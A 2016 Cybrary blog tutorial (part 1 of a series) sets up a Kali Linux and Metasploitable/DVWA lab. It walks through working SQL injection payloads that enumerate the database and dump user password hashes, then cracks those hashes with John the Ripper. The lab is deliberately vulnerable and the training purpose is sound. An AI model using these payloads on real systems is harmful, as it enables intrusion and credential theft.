Ready to Start Your Career?

SQL Injection Lab Part 1 – Lab Setup

bjacharya 's profile image

By: bjacharya

September 6, 2016

Hello Cybrarians ! ! !

Welcome to: SQL injection lab PT.1 – Intro/Lab setup

In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide to learn SQL Injection.

*Skill/Experience : Before proceeding to this series, you must know basics on setting up VM environments.


  • Let’s start from LAB setup (This part explains how we will perform this lab, and what will we deal with).> Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode. (You must knw this)> Check IP address of both devices.
Step-by-step instruction
  1. Open Kali Linux (or BT 5r3)
  2. Open your browser and type https://IP address of Metasploitable/dvwa/login.php
  3. Login with user name “admin” and password “password”
  4. Click on DVWA Security and set it to low then submit
  5. Click on manual SQL injection
  6. On User ID box type 1 and Submit (Php select statement: $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id'”;)
  7.  %’ or ‘0’=’0 (mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0′;)
  8.  Get DB version: %’ or 0=0 union select null, version()#
  9. Get DB user: %’ or 0=0 union select null, user()#
  10. Get DB name: %’ or 0=0 union select null, database()#
  11.  Get Schima information: %’ and 1=0 union select null, table_name from information_schema.tables#
  12. Get user table in Schema information: %’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#
  13. Get all the columns fields in the information_schema user table: %’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’#
  14. Let’s get password authentication hash: %’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users#
  15. Now copy all the hash file in a notepad as below format E.g. user:password
  16. Save it to /pentest/passwords/john by name dvwa_password.txt
  17. Open a console and go to /pentest/passwords/john
  18. cd /pentest/passwords/john
  19. now lunch john the ripper ./john –format=raw-MD5 dvwa_password.txt and hit enter.
(You will get the passwords)

….Ok Cybrarians, we’ll continue this in the next part.

By : Bijay Acharya 

Schedule Demo